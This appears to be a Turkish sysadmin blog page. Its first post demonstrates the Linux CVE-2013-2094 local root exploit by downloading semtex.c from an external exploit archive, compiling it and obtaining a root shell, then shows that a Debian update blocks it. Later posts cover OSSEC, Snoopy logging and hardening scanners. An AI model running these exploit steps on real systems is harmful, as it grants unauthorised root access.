dinçer salih kurnaz
Tech. Consultant,
Platform independent senior system administrator.
Servers/Hardware,
Operating Systems/Applications,
Storage,
Networking,
IT Security,
Virtualization,
Cloud Computing/Cloud Management,
Linux
Oracle

Linux PERF_EVENTS Local Root

Linux local root exploit CVE-2013-2094

dincer@debian:~$ uname -a

Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.39-2 x86_64 GNU/Linux

dincer@debian:~$ cat /etc/issue

Debian GNU/Linux 7.0 \n \l

 

dincer@debian:~$ id dincer

uid=1004(dincer) gid=1002(dincer) groups=1002(dincer)

dincer@debian:~$ wget http://dl.packetstormsecurity.net/1305-exploits/semtex.c

dincer@debian:~$ gcc -O2 semtex.c && ./a.out

2.6.37-3.x x86_64

sd@fucksheep.org 2010

root@debian:~#  TA TAAA :)

root@debian:~# id

uid=0(root) gid=0(root) groups=0(root),1002(dincer)

Önlem:

Sistemde derleyici yüklü olmamalı!

Çözüm:

Debian update edin.

dincer@debian:~$ uname -a

Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.41-2+deb7u2 x86_64 GNU/Linux

dincer@debian:~$ ./a.out

a.out: semtex.c:51: sheep: Assertion `!close(fd)’ failed.

Aborted

Comments

Debian Ossec

* OSSEC nedir

log monitoring

dosya butunluk kontrolu

rootkit kontrolu

aktif cevap

* Kuralim

root@debian:~# aptitude install build-essential

root@debian:~# wget http://www.ossec.net/files/ossec-hids-2.7.tar.gz

root@debian:~# tar zxvf ossec-hids-2.7.tar.gz

root@debian:~# cd ossec-hids-2.7/

root@debian:~/ossec-hids-2.7#./install.sh

en

server

y

y

y

- To start OSSEC HIDS:

                /var/ossec/bin/ossec-control start

 - To stop OSSEC HIDS:

                /var/ossec/bin/ossec-control stop

 - The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

/var/ossec/bin/manage_agents

* Başlatalım

root@debian:/var/ossec# /var/ossec/bin/ossec-control start

Starting OSSEC HIDS v2.7 (by Trend Micro Inc.)…

Started ossec-maild…

Started ossec-execd…

Started ossec-analysisd…

Started ossec-logcollector…

Started ossec-remoted…

Started ossec-syscheckd…

Started ossec-monitord…

Completed.

* Kontrol edelim.

root@debian:/var/ossec# ls

active-response  agentless  bin  etc  logs  queue  rules  stats  tmp  var

root@debian:/var/ossec# vi /var/ossec/etc/ossec.conf

root@debian:/var/ossec# cat /etc/passwd

ossec:x:1001:1001::/var/ossec:/bin/false

ossecm:x:1002:1001::/var/ossec:/bin/false

ossecr:x:1003:1001::/var/ossec:/bin/false

root@debian:/var/ossec# ps aux | grep ossec

ossecm   11037  0.0  0.1  16892   544 ?        S    16:20   0:00 /var/ossec/bin/ossec-maild

root     11041  0.0  0.1  12556   520 ?        S    16:20   0:00 /var/ossec/bin/ossec-execd

ossec    11045  0.2  0.4  14384  2428 ?        S    16:20   0:00 /var/ossec/bin/ossec-analysisd

root     11047  0.0  0.1   4308   548 ?        S    16:20   0:00 /var/ossec/bin/ossec-logcollector

root     11060  0.0  0.0   4472   488 ?        S    16:20   0:00 /var/ossec/bin/ossec-syscheckd

ossec    11064  0.0  0.1  12816   520 ?        S    16:20   0:00 /var/ossec/bin/ossec-monitord

ossecm   11075  0.0  0.0      0     0 ?        Z    16:20   0:00 [ossec-maild] <defunct>

root@debian:/var/ossec# /var/ossec/bin/agent_control -r -a

* Test edelim.

root@debian:/var/ossec# logger “Segmentation Fault” 

syscheck and rootcheck taraması

root@debian:/var/ossec# /var/ossec/bin/agent_control -r -u 000

Comments

Debian Linux üzerinde Snoopy Logger kurulumu

Bu uygulama sistemde yapılan tüm execve() syscall ları log dosyasına kayıt edebiliyor.

https://github.com/renard/snoopylogger

Kuruluma başlayalım.

root@debian:~# cat /etc/issue

Debian GNU/Linux 7.0 \n \l

root@debian:~# uname -a

Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.41-2 x86_64 GNU/Linux

root@debian:~# aptitude install snoopy

Install snoopy library to /etc/ld.so.preload? 

[ Yes ]

root@debian:~# dpkg -S snoopy

snoopy: /usr/share/lintian/overrides/snoopy

snoopy: /usr/share/doc/snoopy

snoopy: /usr/share/doc/snoopy/copyright

snoopy: /usr/share/doc/snoopy/changelog.gz

snoopy: /usr/share/doc/snoopy/README.Debian

snoopy: /usr/share/doc/snoopy/README

snoopy: /usr/share/doc/snoopy/changelog.Debian.gz

snoopy: /usr/share/doc/snoopy/TODO

snoopy: /lib/snoopy.so

root@debian:~# reboot

Kurulum bitti.

Test edelim.

root@debian:~# ls test

ls: cannot access test: No such file or directory

root@debian:~# ls deneme

ls: cannot access deneme: No such file or directory

root@debian:~# tail /var/log/auth.log

May 10 14:37:47 debian snoopy[2905]: [uid:0 sid:2771 tty:/dev/pts/0 cwd:/root filename:/bin/ls]: ls test

May 10 14:37:51 debian snoopy[2906]: [uid:0 sid:2771 tty:/dev/pts/0 cwd:/root filename:/bin/ls]: ls deneme

May 10 14:38:00 debian snoopy[2913]: [uid:0 sid:2771 tty:/dev/pts/0 cwd:/root filename:/usr/bin/tail]: tail /var/log/auth.log

Comments

Selenium Server JAVA ve dil problemi

Eğer Selenium Server çalıştırdığını windows türkçe ise sendKeys de patlıyor.:(

İngilizce XP de sorun olmadığını görünce anladım.

Aşağıdaki gibi çalıştırmak gerek.

java -jar -Dfile.encoding=UTF8 -Duser.language=en -Duser.region=US selenium-server-standalone-2.32.0.jar -port 4450

Ek olarak buraya bakılabilir http://publib.boulder.ibm.com/infocenter/iseries/v5r4/index.jsp?topic=%2Frzaha%2Fsysprop2.htm

Comments

Tertemiz linux

sudo aptitude install lynis chkrootkit rkhunter lsat yasat

sudo lsat

Starting LSAT…

Getting system information…

Running modules…

 Running checkpkgs module…

 Running checkinetd module…

Finished.

Check lsat.out for details.

sudo yasat -f

sudo lynis —check-all

sudo rkhunter —check

sudo chkrootkit

  • System tools: system binaries
  • Boot and services: boot loaders, startup services
  • Kernel: run level, loaded modules, kernel configuration, core dumps
  • Memory and processes: zombie processes, IO waiting processes
  • Users, groups and authentication: group IDs, sudoers, PAM configuration, password aging, default mask
  • Shells
  • File systems: mount points, /tmp files, root file system
  • Storage: usb-storage, firewire ohci
  • NFS
  • Software: name services: DNS search domain, BIND
  • Ports and packages: vulnerable/upgradable packages, security repository
  • Networking: nameservers, promiscuous interfaces, connections
  • Printers and spools: cups configuration
  • Software: e-mail and messaging
  • Software: firewalls: iptables, pf
  • Software: webserver: Apache, nginx
  • SSH support: SSH configuration
  • SNMP support
  • Databases: MySQL root password
  • LDAP services
  • Software: php: php options
  • Squid support
  • Logging and files: syslog daemon, log directories
  • Insecure services: inetd
  • Banners and identification
  • Scheduled tasks: crontab/cronjob, atd
  • Accounting: sysstat data, auditd
  • Time and synchronization: ntp daemon
  • Cryptography: SSL certificate expiration
  • Virtualization
  • Security frameworks: AppArmor, SELinux, grsecurity status
  • Software: file integrity
  • Software: malware scanners
  • Home directories: shell history files
Comments